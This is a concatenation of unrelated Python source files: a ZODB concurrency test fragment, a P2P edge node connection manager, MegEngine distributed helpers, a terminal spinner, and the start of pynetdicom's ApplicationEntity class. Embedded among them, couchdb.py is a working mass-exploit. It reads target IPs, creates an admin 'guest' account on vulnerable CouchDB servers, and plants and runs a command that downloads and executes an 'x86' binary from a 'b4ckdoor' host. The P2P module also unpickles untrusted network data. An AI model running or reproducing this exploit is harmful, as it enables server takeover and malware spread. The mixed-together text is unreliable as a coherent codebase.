# Once in a while T tries to modify obj{1,2}.value maintaining the invariant as
# test source of changes for other workers.
failed = threading.Event()
failure = [None] * nwork # [tx] is failure from T(tx)
def T(tx, N):
db = dbopen()
def t_():
transaction.begin()
zconn = db.open()
root = zconn.root()
obj1 = root['obj1']
obj2 = root['obj2']
# obj1 - reload it from zstor
# obj2 - get it from zconn cache
obj1._p_invalidate()
# both objects must have the same values
i1 = obj1.value
i2 = obj2.value
if i1 != i2:
#print('FAIL')
failure[tx] = "T%s: obj1.value (%d) != obj2.value (%d)" % (tx, i1, i2)
failed.set()
# change objects once in a while
if randint(0,4) == 0:
#print("T%s: modify" % tx)
obj1.value += 1
obj2.value += 1
try:
transaction.commit()
except POSException.ConflictError:
#print('conflict -> ignore')
transaction.abort()
zconn.close()
try:
for i in range(N):
#print('T%s.%d' % (tx, i))
t_()
if failed.is_set():
break
except:
failed.set()
raise
finally:
db.close()
# run the workers concurrently.
init()
N = 100
tg = []
for x in range(nwork):
t = threading.Thread(name='T%d' % x, target=T, args=(x, N))
t.start()
tg.append(t)
for t in tg:
t.join(60)
if failed.is_set():
self.fail([_ for _ in failure if _])
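# Hedged illustration (not part of BasicStorage): a sketch of how a client-server
# storage's test subclass might implement _new_storage_client() so that the
# external-invalidation race test above can open several clients against a single
# test server. ZEO.client() is real ZEO API, but the subclass name and the way the
# server address is obtained (self._storage._addr) are assumptions of this sketch.
#
#     class ZEOBasicStorageTests(BasicStorage, StorageTestBase):
#         def _new_storage_client(self):
#             import ZEO
#             # open a fresh client connection to the same test server
#             return ZEO.client(self._storage._addr)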
|
couchdb.py
|
#!/usr/bin/env python
from requests.auth import HTTPBasicAuth
import random
import requests
import re
import sys
from threading import Thread
from time import sleep
ips = open(sys.argv[1], "r").readlines()
Rdatabases = ["/a564r6fusmg","/dyejdffyjdxryj","/esreghsrgfbgrsb","/sfafdbsrdgjqef","/fyukddyuodyj","/yfjdued6yjdsza","/wefrhnwgerhgsrh","/sfdrebwbef","/fdfgffrgfdsg"]
def getVersion(ip):
version = requests.get(ip).json()["version"]
return version
def exploit(ip):
global Rdatabases
try:
try:
if sys.argv[2] == "-r":
cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root;"
elif sys.argv[2] == "-c":
cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root;"
elif sys.argv[2] == "-w":
cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root;"
elif sys.argv[2] == "-x":
cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root; "
elif not sys.argv[2]:
print "NOT ENOUGH ARGUMENTS!"
sys.exit(0)
except SyntaxError as e:
print "\n Options: (-r|-c|-w|-x)"
db_ = random.choice(Rdatabases)
db = db_
ip = ip.rstrip("\n")
ip = "http://"+ip+":5984"
version = getVersion(ip)
#print("[*] Detected CouchDB Version " + version)
vv = version.replace(".", "")
v = int(version[0])
if v == 1 and int(vv) <= 170:
version = 1
elif v == 2 and int(vv) < 211:
version = 2
else:
#print("[-] Version " + version + " not vulnerable.")
sys.exit()
with requests.session() as session:
#print("[*] Attempting %s Version %d"%(ip,v))
session.headers = {"Content-Type": "application/json"}
try:
payload = '{"type": "user", "name": "'
payload += "guest"
payload += '", "roles": ["_admin"], "roles": [],'
payload += '"password": "guest"}'
pr = session.put(ip + "/_users/org.couchdb.user:guest",
data=payload)
#print("[+] User guest with password guest successfully created.")
except requests.exceptions.HTTPError:
sys.exit()
session.auth = HTTPBasicAuth("guest", "guest")
try:
if version == 1:
session.put(ip + "/_config/query_servers/cmd",
data='"' + cmd + '"')
#print("[+] Created payload at: " + ip + "/_config/query_servers/cmd")
else:
host = session.get(ip + "/_membership").json()["all_nodes"][0]
session.put(ip + "/_node/" + ip + "/_config/query_servers/cmd",
data='"' + cmd + '"')
#print("[+] Created payload at: " + ip + "/_node/" + host + "/_config/query_servers/cmd")
except requests.exceptions.HTTPError as e:
sys.exit()
try:
session.put(ip + db)
session.put(ip + db + "/zero", data='{"_id": "HTP"}')
except requests.exceptions.HTTPError:
sys.exit()
# Execute payload
try:
if version == 1:
session.post(ip + db + "/_temp_view?limit=10",
data='{"language": "cmd", "map": ""}')
else:
session.post(ip + db + "/_design/zero",
data='{"_id": "_design/zero", "views": {"god": {"map": ""} }, "language": "cmd"}')
print("[+] Command executed: " + cmd)
except requests.exceptions.HTTPError:
sys.exit()
#print("[*] Cleaning up.")
# Cleanup database
try:
session.delete(ip + db)
except requests.exceptions.HTTPError:
sys.exit()
# Cleanup payload
try:
if version == 1:
session.delete(ip + "/_config/query_servers/cmd")
else:
host = session.get(ip + "/_membership").json()["all_nodes"][0]
session.delete(ip + "/_node" + host + "/_config/query_servers/cmd")
except requests.exceptions.HTTPError:
sys.exit()
except:
pass
for ip in ips:
try:
hoho = Thread(target=exploit, args=(ip,))
hoho.start()
sleep(0.001)
except:
pass
|
connection_manager_4edge.py
|
import socket
import threading
import pickle
import codecs
from concurrent.futures import ThreadPoolExecutor
from .core_node_list import CoreNodeList
from .message_manager import (
MessageManager,
MSG_CORE_LIST,
MSG_PING,
MSG_ADD_AS_EDGE,
ERR_PROTOCOL_UNMATCH,
ERR_VERSION_UNMATCH,
OK_WITH_PAYLOAD,
OK_WITHOUT_PAYLOAD,
)
# Value used while testing; in practice an interval of about 30 minutes (1800 seconds) would be better.
PING_INTERVAL = 10
class ConnectionManager4Edge(object):
def __init__(self, host, my_port, my_core_host, my_core_port, callback):
print('Initializing ConnectionManager4Edge...')
self.host = host
self.port = my_port
self.my_core_host = my_core_host
self.my_core_port = my_core_port
self.core_node_set = CoreNodeList()
self.mm = MessageManager()
self.callback = callback
def start(self):
"""
最初の待受を開始する際に呼び出される(ClientCore向け
"""
t = threading.Thread(target=self.__wait_for_access)
t.start()
self.ping_timer = threading.Timer(PING_INTERVAL, self.__send_ping)
self.ping_timer.start()
def connect_to_core_node(self):
"""
ユーザが指定した既知のCoreノードへの接続(ClientCore向け
"""
self.__connect_to_P2PNW(self.my_core_host,self.my_core_port)
def get_message_text(self, msg_type, payload = None):
"""
指定したメッセージ種別のプロトコルメッセージを作成して返却する
params:
msg_type : 作成したいメッセージの種別をMessageManagerの規定に従い指定
payload : メッセージにデータを格納したい場合に指定する
return:
msgtxt : MessageManagerのbuild_messageによって生成されたJSON形式のメッセージ
"""
msgtxt = self.mm.build(msg_type, self.port, payload)
print('generated_msg:', msgtxt)
return msgtxt
def send_msg(self, peer, msg):
"""
指定されたノードに対してメッセージを送信する
params:
peer : 接続先のIPアドレスとポート番号を格納するタプル
msg : 送信したいメッセージ(JSON形式を想定)
"""
print('Sending... ', msg)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((peer))
s.sendall(msg.encode('utf-8'))
s.close()
except:
print('Connection failed for peer : ', peer)
self.core_node_set.remove(peer)
            print('Trying to connect to the P2P network...')
current_core_list = self.core_node_set.get_list()
if len(current_core_list) != 0:
new_core = self.core_node_set.get_c_node_info()
self.my_core_host = new_core[0]
self.my_core_port = new_core[1]
                self.connect_to_core_node()
self.send_msg((new_core[0], new_core[1]), msg)
else:
print('No core node found in our list...')
self.ping_timer.cancel()
def connection_close(self):
"""
終了前の処理としてソケットを閉じる
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect( (self.host, self.port))
self.socket.close()
s.close()
self.ping_timer.cancel()
def __connect_to_P2PNW(self, host, port):
"""
指定したCoreノードへ接続要求メッセージを送信する
params:
host : 接続先となるCoreノードのIPアドレス
port : 接続先となるCoreノードのポート番号
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
msg = self.mm.build(MSG_ADD_AS_EDGE, self.port)
print(msg)
s.sendall(msg.encode('utf-8'))
s.close()
def __wait_for_access(self):
"""
Serverソケットを開いて待ち受け状態に移行する
"""
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind((self.host, self.port))
self.socket.listen(0)
executor = ThreadPoolExecutor(max_workers=10)
while True:
print('Waiting for the connection ...')
soc, addr = self.socket.accept()
print('Connected by .. ', addr)
data_sum = ''
params = (soc, addr, data_sum)
executor.submit(self.__handle_message, params)
def __handle_message(self, params):
"""
受信したメッセージを確認して、内容に応じた処理を行う。クラスの外からは利用しない想定
params :
soc : 受信したsocketのコネクション
addr : 送信元のアドレス情報
data_sum : 受信したデータを連結するためのベースにする空文字
"""
soc, addr, data_sum = params
while True:
data = soc.recv(1024)
data_sum = data_sum + data.decode('utf-8')
if not data:
break
if not data_sum:
return
result, reason, cmd, peer_port, payload = self.mm.parse(data_sum)
print(result, reason, cmd, peer_port, payload)
status = (result, reason)
if status == ('error', ERR_PROTOCOL_UNMATCH):
print('Error: Protocol name is not matched')
return
elif status == ('error', ERR_VERSION_UNMATCH):
print('Error: Protocol version is not matched')
return
elif status == ('ok', OK_WITHOUT_PAYLOAD):
if cmd == MSG_PING:
pass
else:
                # The Edge node is not expected to handle messages other than connection-related ones
print('Edge node does not have functions for this message!')
elif status == ('ok', OK_WITH_PAYLOAD):
if cmd == MSG_CORE_LIST:
                # There is at least a hook for requesting and receiving the core node list from a Core node
print('Refresh the core node list...')
new_core_set = pickle.loads(payload.encode('utf8'))
print('latest core node list: ', new_core_set)
self.core_node_set.overwrite(new_core_set)
else:
self.callback((result, reason, cmd, peer_port, payload))
else:
print('Unexpected status', status)
def __send_ping(self):
"""
生存確認メッセージの送信処理実体。中で確認処理は定期的に実行し続けられる
param:
peer : 送信確認メッセージの送り先となるノードの接続情報(IPアドレスとポート番号)
"""
peer = (self.my_core_host, self.my_core_port)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((peer))
msg = self.mm.build(MSG_PING)
s.sendall(msg.encode('utf-8'))
s.close()
except:
print('Connection failed for peer : ', peer)
self.core_node_set.remove(peer)
            print('Trying to connect to the P2P network...')
current_core_list = self.core_node_set.get_list()
if len(current_core_list) != 0:
new_core = self.core_node_set.get_c_node_info()
self.my_core_host = new_core[0]
self.my_core_port = new_core[1]
                self.connect_to_core_node()
else:
print('No core node found in our list...')
self.ping_timer.cancel()
self.ping_timer = threading.Timer(PING_INTERVAL, self.__send_ping)
self.ping_timer.start()
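# Hedged usage sketch (not part of the original module). The host, ports and callback
# below are made-up values, and the Core node at 192.168.1.10:50082 is assumed to be
# already running a Core-side ConnectionManager.
def _example_edge_usage():
    def on_message(msg_tuple):
        # msg_tuple is (result, reason, cmd, peer_port, payload) as passed by __handle_message
        print('application callback received:', msg_tuple)
    cm = ConnectionManager4Edge('0.0.0.0', 50090, '192.168.1.10', 50082, on_message)
    cm.start()                   # start listening and the periodic ping timer
    cm.connect_to_core_node()    # register this Edge with the known Core node
    return cm                    # call cm.connection_close() on shutdown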
|
helper.py
|
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import functools
import multiprocessing as mp
from collections import defaultdict
from typing import Callable
from weakref import WeakSet
import numpy as np
from megengine.autodiff.grad_manager import GradManager, get_backwarding_grad_manager
from megengine.device import get_default_device, get_device_count
from ..core.ops.builtin import ParamPackConcat, ParamPackSplit
from ..core.tensor.core import apply
from ..functional.utils import copy
from ..tensor import Tensor
from ..utils.future import Future
from .functional import all_reduce_sum, broadcast
from .group import WORLD, Group, group_barrier, is_distributed
def param_pack_split(inp: Tensor, offsets: list, shapes: list):
r"""
    Splits the input tensor into a list of tensors according to the given offsets
    and shapes; only used for ``parampack``.
:param inp: input tensor.
    :param offsets: offsets of outputs, with length `2 * n`,
        where n is the number of tensors to split into,
        in the format `[begin0, end0, begin1, end1]`.
:param shapes: tensor shapes of outputs.
    :return: split tensors.
Examples:
.. testcode::
import numpy as np
from megengine import tensor
from megengine.distributed.helper import param_pack_split
a = tensor(np.ones((10,), np.int32))
b, c = param_pack_split(a, [0, 1, 1, 10], [(1,), (3, 3)])
print(b.numpy())
print(c.numpy())
Outputs:
.. testoutput::
[1]
[[1 1 1]
[1 1 1]
[1 1 1]]
"""
op = ParamPackSplit()
op.offsets = offsets
op.shapes = shapes
return apply(op, inp)
def param_pack_concat(inps: list, offsets: Tensor, offsets_val: list):
r"""
    Returns the concatenated tensor; only used for ``parampack``.
:param inps: input tensors.
:param offsets: device value of offsets.
:param offsets_val: offsets of inputs, length of `2 * n`,
format `[begin0, end0, begin1, end1]`.
    :return: concatenated tensor.
Examples:
.. testcode::
import numpy as np
from megengine import tensor
from megengine.distributed.helper import param_pack_concat
a = tensor(np.ones((1,), np.int32))
b = tensor(np.ones((3, 3), np.int32))
offsets_val = [0, 1, 1, 10]
offsets = tensor(offsets_val, np.int32)
c = param_pack_concat([a, b], offsets, offsets_val)
print(c.numpy())
Outputs:
.. testoutput::
[1 1 1 1 1 1 1 1 1 1]
"""
op = ParamPackConcat()
op.offsets = offsets_val
return apply(op, *inps, offsets)[0]
def get_offsets(shapes):
offsets = []
offset = 0
for shape in shapes:
offsets.append(offset)
offset += int(np.prod(shape))
offsets.append(offset)
return offsets
def pack_allreduce_split(pack_list, shapes, group, reduce_method):
offsets_val = get_offsets(shapes)
offsets = Tensor(offsets_val)
packed_grads = param_pack_concat(pack_list, offsets, offsets_val)
packed_grads = all_reduce_sum(packed_grads, group, group.comp_node)
if reduce_method == "mean":
packed_grads /= group.size
grads = param_pack_split(packed_grads, offsets_val, shapes)
return grads
class TensorFuture(Future):
    def device(self):
        raise RuntimeError("Sorry, this tensor is not ready")
    def numpy(self):
        raise RuntimeError("Sorry, this tensor is not ready")
    def shape(self):
        raise RuntimeError("Sorry, this tensor is not ready")
    def dtype(self):
        raise RuntimeError("Sorry, this tensor is not ready")
def synchronized(func: Callable):
"""Decorator. Decorated function will synchronize when finished.
Specifically, we use this to prevent data race during hub.load"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
if not is_distributed():
return func(*args, **kwargs)
ret = func(*args, **kwargs)
group_barrier()
return ret
return wrapper
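# Hedged usage sketch (illustrative only; not part of the module): wrapping a helper
# with ``synchronized`` makes every process wait at a group barrier after it returns,
# which is the hub.load data-race scenario mentioned in the docstring. The function
# below is a made-up no-op.
@synchronized
def _example_synchronized_step():
    # in real use this body would e.g. download or deserialize model weights
    return None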
def _get_device_count_worker(queue, device_type):
num = get_device_count(device_type)
queue.put(num)
def get_device_count_by_fork(device_type: str):
"""Get device count in fork thread.
See https://stackoverflow.com/questions/22950047/cuda-initialization-error-after-fork
for more information.
"""
q = mp.Queue()
p = mp.Process(target=_get_device_count_worker, args=(q, device_type))
p.start()
p.join()
return q.get()
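# Hedged usage sketch: query the visible device count from a forked subprocess before
# the parent process touches CUDA, e.g.
#
#     n_gpus = get_device_count_by_fork("gpu")
#
# ("gpu" is the device type string accepted by megengine.device.get_device_count;
# treat the variable name as illustrative.)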
def bcast_list_(inps: list, group: Group = WORLD):
"""Broadcast tensors between given group.
:param inps: input tensors.
:param group: communication group.
"""
for inp in inps:
inp._reset(broadcast(inp, group))
class AllreduceCallback:
"""Allreduce Callback with tensor fusion optimization.
    :param reduce_method: the method to reduce gradients.
:param group: communication group.
"""
def __init__(self, reduce_method: str, group: Group = WORLD):
reduce_method = reduce_method.lower()
assert reduce_method in ["sum", "mean"], "reduce_method should be sum or mean"
self._reduce_method = reduce_method
self._group = group
self._marked_gm = WeakSet()
self._param_pack_thd = 10 * 1024 * 1024
self._reset()
def _reset(self):
self._params = []
self._gradients_dict = dict()
self._futures_dict = dict()
self._packing_list = defaultdict(list)
self._packing_size = defaultdict(int)
self._grad_origin_device = dict()
def _pack(self, dtype):
grad_list = [self._gradients_dict[p] for p in self._packing_list[dtype]]
shapes = [p.shape for p in self._packing_list[dtype]]
reduced_grads = pack_allreduce_split(
grad_list, shapes, self._group, self._reduce_method
)
for param, grad in zip(self._packing_list[dtype], reduced_grads):
self._gradients_dict[param] = grad
self._packing_list[dtype] = []
self._packing_size[dtype] = 0
def __call__(self, param, grad):
gm = get_backwarding_grad_manager()
assert isinstance(gm, GradManager)
if gm not in self._marked_gm:
gm._register_after_backward_callback(self._flush)
self._marked_gm.add(gm)
self._params.append(param)
self._futures_dict[param] = TensorFuture(ack=False)
self._gradients_dict[param] = grad
self._grad_origin_device[param] = str(grad.device)
dtype_str = str(np.dtype(param.dtype))
dtype_size = np.dtype(param.dtype).itemsize
self._packing_list[dtype_str].append(param)
self._packing_size[dtype_str] += int(np.prod(param.shape)) * dtype_size
if self._packing_size[dtype_str] > self._param_pack_thd:
self._pack(dtype_str)
return self._futures_dict[param]
def _flush(self):
for dtype in sorted(self._packing_list.keys()):
self._pack(dtype)
for param in self._params:
grad = self._gradients_dict[param]
grad = copy(grad, self._grad_origin_device[param])
self._futures_dict[param].set(grad)
self._reset()
make_allreduce_cb = AllreduceCallback
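# Hedged usage sketch (not part of the module): registering the fused allreduce
# callback with a GradManager for data-parallel training. ``model``, ``data`` and
# ``loss`` are stand-ins for a user's Module, inputs and loss value.
#
#     gm = GradManager().attach(
#         model.parameters(),
#         callbacks=[make_allreduce_cb("mean", WORLD)],
#     )
#     with gm:
#         loss = model(data)
#         gm.backward(loss)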
|
spinny.py
|
# pylint: skip-file
import itertools, time, threading, sys
class Spinner:
def __init__(self, dt='Loading...', at='Done.'): self.spinner,self.dt,self.at,self.busy = itertools.cycle('⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏'),dt,at,True
def spin(self):
while self.busy: [print(f'{next(self.spinner)} {self.dt}', end='\r', flush=True), time.sleep(0.1)]
def __enter__(self): self.busy, _ = True, threading.Thread(target=self.spin).start()
def __exit__(self, v1, v2, v3):
self.busy, _, _ = False, time.sleep(0.1), print(' ' * (len(self.dt) + 2), end='\r')
return [True, print('❌ Failed: ' + repr(v2)), sys.exit(1)][0] if v1 is not None else print('\r\033[0;32m✓\033[0m ' + self.at)
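# Hedged usage sketch: wrap any slow call in the context manager; the message strings
# are just the defaults shown above.
#
#     with Spinner('Loading...', 'Done.'):
#         time.sleep(2)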
|
ae.py
|
"""
The main user class, represents a DICOM Application Entity
"""
from copy import deepcopy
from datetime import datetime
import logging
from ssl import SSLContext
import threading
from typing import (
Union,
Optional,
List,
Tuple,
Dict,
cast,
TypeVar,
Type,
Any,
Sequence,
)
import warnings
from pydicom.uid import UID
from pynetdicom import _config
from pynetdicom.association import Association
from pynetdicom.events import EventHandlerType
from pynetdicom.presentation import PresentationContext
from pynetdicom.pdu_primitives import _UI
from pynetdicom.transport import (
AssociationSocket,
AssociationServer,
ThreadedAssociationServer,
)
from pynetdicom.utils import make_target, set_ae, decode_bytes, set_uid
from pynetdicom._globals import (
MODE_REQUESTOR,
DEFAULT_MAX_LENGTH,
DEFAULT_TRANSFER_SYNTAXES,
BIND_ADDRESS,
)
LOGGER = logging.getLogger("pynetdicom.ae")
_T = TypeVar("_T")
ListCXType = List[PresentationContext]
TSyntaxType = Optional[Union[str, UID, Sequence[Union[str, UID]]]]
class ApplicationEntity:
"""Represents a DICOM Application Entity (AE).
An AE may be a *Service Class Provider* (SCP), a *Service Class User* (SCU)
or both.
"""
# pylint: disable=too-many-instance-attributes,too-many-public-methods
def __init__(self, ae_title: str = "PYNETDICOM") -> None:
"""Create a new Application Entity.
.. versionchanged:: 2.0
`ae_title` should be :class:`str`
Parameters
----------
ae_title : str, optional
The AE title of the Application Entity as an ASCII string
(default: ``'PYNETDICOM'``).
"""
self._ae_title: str
self.ae_title = ae_title
from pynetdicom import (
PYNETDICOM_IMPLEMENTATION_UID,
PYNETDICOM_IMPLEMENTATION_VERSION,
)
# Default Implementation Class UID and Version Name
self._implementation_uid: UID = PYNETDICOM_IMPLEMENTATION_UID
self._implementation_version: Optional[str] = PYNETDICOM_IMPLEMENTATION_VERSION
# List of PresentationContext
self._requested_contexts: ListCXType = []
# {abstract_syntax : PresentationContext}
self._supported_contexts: Dict[UID, PresentationContext] = {}
# Default maximum simultaneous associations
self._maximum_associations = 10
# Default maximum PDU receive size (in bytes)
self._maximum_pdu_size = DEFAULT_MAX_LENGTH
# Default timeouts - None means no timeout
self._acse_timeout: Optional[float] = 30
self._connection_timeout: Optional[float] = None
self._dimse_timeout: Optional[float] = 30
self._network_timeout: Optional[float] = 60
# Require Calling/Called AE titles to match if value is non-empty str
self._require_calling_aet: List[str] = []
self._require_called_aet = False
self._servers: List[ThreadedAssociationServer] = []
self._lock: threading.Lock = threading.Lock()
@property
def acse_timeout(self) -> Optional[float]:
"""Get or set the ACSE timeout value (in seconds).
Parameters
----------
value : Union[int, float, None]
The maximum amount of time (in seconds) to wait for association
related messages. A value of ``None`` means no timeout. (default:
``30``)
"""
return self._acse_timeout
@acse_timeout.setter
def acse_timeout(self, value: Optional[float]) -> None:
"""Set the ACSE timeout (in seconds)."""
if value is None:
self._acse_timeout = None
elif isinstance(value, (int, float)) and value >= 0:
self._acse_timeout = value
else:
LOGGER.warning("ACSE timeout set to 30 seconds")
self._acse_timeout = 30
for assoc in self.active_associations:
assoc.acse_timeout = self.acse_timeout
@property
def active_associations(self) -> List[Association]:
"""Return a list of the AE's active
:class:`~pynetdicom.association.Association` threads.
Returns
-------
list of Association
A list of all active association threads, both requestors and
acceptors.
"""
threads = threading.enumerate()
t_assocs = [tt for tt in threads if isinstance(tt, Association)]
return [tt for tt in t_assocs if tt.ae == self]
def add_requested_context(
self,
abstract_syntax: Union[str, UID],
transfer_syntax: TSyntaxType = None,
) -> None:
"""Add a :ref:`presentation context<user_presentation>` to be
proposed when requesting an association.
When an SCU sends an association request to a peer it includes a list
of presentation contexts it would like the peer to support. This
method adds a single
:class:`~pynetdicom.presentation.PresentationContext` to the list of
the SCU's requested contexts.
Only 128 presentation contexts can be included in the association
request. Multiple presentation contexts may be requested with the
same abstract syntax.
To remove a requested context or one or more of its transfer syntaxes
see the :meth:`remove_requested_context` method.
Parameters
----------
abstract_syntax : str or pydicom.uid.UID
The abstract syntax of the presentation context to request.
transfer_syntax : str/pydicom.uid.UID or list of str/pydicom.uid.UID
The transfer syntax(es) to request (default:
:attr:`~pynetdicom._globals.DEFAULT_TRANSFER_SYNTAXES`).
Raises
------
ValueError
If 128 requested presentation contexts have already been added.
Examples
--------
Add a requested presentation context for *Verification SOP Class* with
the default transfer syntaxes by using its UID value.
>>> from pynetdicom import AE
>>> ae = AE()
>>> ae.add_requested_context('1.2.840.10008.1.1')
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Little Endian
=Explicit VR Big Endian
Add a requested presentation context for *Verification SOP Class* with
the default transfer syntaxes by using the inbuilt
:class:`~pynetdicom.sop_class.Verification` object.
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_requested_context(Verification)
Add a requested presentation context for *Verification SOP Class* with
a transfer syntax of *Implicit VR Little Endian*.
>>> from pydicom.uid import ImplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_requested_context(Verification, ImplicitVRLittleEndian)
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
Add two requested presentation contexts for *Verification SOP Class*
using different transfer syntaxes for each.
>>> from pydicom.uid import (
... ImplicitVRLittleEndian, ExplicitVRLittleEndian, ExplicitVRBigEndian
... )
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_requested_context(
... Verification, [ImplicitVRLittleEndian, ExplicitVRBigEndian]
... )
>>> ae.add_requested_context(Verification, ExplicitVRLittleEndian)
>>> len(ae.requested_contexts)
2
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Big Endian
>>> print(ae.requested_contexts[1])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Explicit VR Little Endian
References
----------
* DICOM Standard, Part 8,
:dcm:`Section 7.1.1.13<part08.html#sect_7.1.1.13>`
* DICOM Standard, Part 8,
:dcm:`Table 9-18<part08.html#table_9-18>`
"""
if transfer_syntax is None:
transfer_syntax = DEFAULT_TRANSFER_SYNTAXES
if len(self.requested_contexts) >= 128:
raise ValueError(
"Failed to add the requested presentation context as there "
"are already the maximum allowed number of requested contexts"
)
# Allow single transfer syntax values for convenience
if isinstance(transfer_syntax, str):
transfer_syntax = [transfer_syntax]
context = PresentationContext()
context.abstract_syntax = UID(abstract_syntax)
context.transfer_syntax = [UID(syntax) for syntax in transfer_syntax]
self._requested_contexts.append(context)
def add_supported_context(
self,
abstract_syntax: Union[str, UID],
transfer_syntax: TSyntaxType = None,
scu_role: Optional[bool] = None,
scp_role: Optional[bool] = None,
) -> None:
"""Add a :ref:`presentation context<user_presentation>` to be
supported when accepting association requests.
When an association request is received from a peer it supplies a list
of presentation contexts that it would like the SCP to support. This
method adds a :class:`~pynetdicom.presentation.PresentationContext`
to the list of the SCP's supported contexts.
Where the abstract syntax is already supported the transfer syntaxes
will be extended by those supplied in `transfer_syntax`. To remove
a supported context or one or more of its transfer syntaxes see the
:meth:`remove_supported_context` method.
Parameters
----------
abstract_syntax : str, pydicom.uid.UID
The abstract syntax of the presentation context to be supported.
transfer_syntax : str/pydicom.uid.UID or list of str/pydicom.uid.UID
The transfer syntax(es) to support (default:
:attr:`~pynetdicom._globals.DEFAULT_TRANSFER_SYNTAXES`).
scu_role : bool or None, optional
If the association requestor includes an
:ref:`SCP/SCU Role Selection Negotiation<user_presentation_role>`
item for this context then:
* If ``None`` then ignore the proposal (if either `scp_role` or
`scu_role` is ``None`` then both are assumed to be) and use the
default roles.
* If ``True`` accept the proposed SCU role
* If ``False`` reject the proposed SCU role
scp_role : bool or None, optional
If the association requestor includes an
:ref:`SCP/SCU Role Selection Negotiation<user_presentation_role>`
item for this context then:
* If ``None`` then ignore the proposal (if either `scp_role` or
`scu_role` is ``None`` then both are assumed to be) and use the
default roles.
* If ``True`` accept the proposed SCP role
* If ``False`` reject the proposed SCP role
Examples
--------
Add support for presentation contexts with an abstract syntax of
*Verification SOP Class* and the default transfer syntaxes by using
its UID value.
>>> from pynetdicom import AE
>>> ae = AE()
>>> ae.add_supported_context('1.2.840.10008.1.1')
>>> print(ae.supported_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Little Endian
=Explicit VR Big Endian
Add support for presentation contexts with an abstract syntax of
*Verification SOP Class* and the default transfer syntaxes by using the
inbuilt :class:`~pynetdicom.sop_class.Verification` object.
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_supported_context(Verification)
Add support for presentation contexts with an abstract syntax of
*Verification SOP Class* and a transfer syntax of *Implicit VR Little
Endian*.
>>> from pydicom.uid import ImplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_supported_context(Verification, ImplicitVRLittleEndian)
>>> print(ae.supported_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
Add support for presentation contexts with an abstract syntax of
*Verification SOP Class* and transfer syntaxes of *Implicit VR Little
Endian* and *Explicit VR Big Endian* and then update the context to
also support *Explicit VR Little Endian*.
>>> from pydicom.uid import (
... ImplicitVRLittleEndian, ExplicitVRLittleEndian, ExplicitVRBigEndian
... )
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_supported_context(
... Verification, [ImplicitVRLittleEndian, ExplicitVRBigEndian]
... )
>>> ae.add_supported_context(Verification, ExplicitVRLittleEndian)
>>> print(ae.supported_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Big Endian
=Explicit VR Little Endian
Add support for *CT Image Storage* and if the association requestor
includes an SCP/SCU Role Selection Negotiation item for *CT Image
Storage* requesting the SCU and SCP roles then accept the proposal.
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import CTImageStorage
>>> ae = AE()
>>> ae.add_supported_context(CTImageStorage, scu_role=True, scp_role=True)
"""
if transfer_syntax is None:
transfer_syntax = DEFAULT_TRANSFER_SYNTAXES # List[str]
abstract_syntax = UID(abstract_syntax)
if not isinstance(scu_role, (type(None), bool)):
raise TypeError("`scu_role` must be None or bool")
if not isinstance(scp_role, (type(None), bool)):
raise TypeError("`scp_role` must be None or bool")
# For convenience allow single transfer syntax values
if isinstance(transfer_syntax, str):
transfer_syntax = [transfer_syntax]
transfer_syntax = [UID(ts) for ts in transfer_syntax]
# If the abstract syntax is already supported then update the transfer
# syntaxes
if abstract_syntax in self._supported_contexts:
context = self._supported_contexts[abstract_syntax]
for syntax in transfer_syntax:
context.add_transfer_syntax(syntax)
context.scu_role = None or scu_role
context.scp_role = None or scp_role
else:
context = PresentationContext()
context.abstract_syntax = abstract_syntax
context.transfer_syntax = transfer_syntax # type: ignore
context.scu_role = None or scu_role
context.scp_role = None or scp_role
self._supported_contexts[abstract_syntax] = context
@property
def ae_title(self) -> str:
"""Get or set the AE title as :class:`str`.
.. versionchanged:: 2.0
`ae_title` should be set using :class:`str` and returns
:class:`str` rather than :class:`bytes`
Parameters
----------
value : str
The AE title to use for the local Application Entity as an ASCII
string.
Returns
-------
str
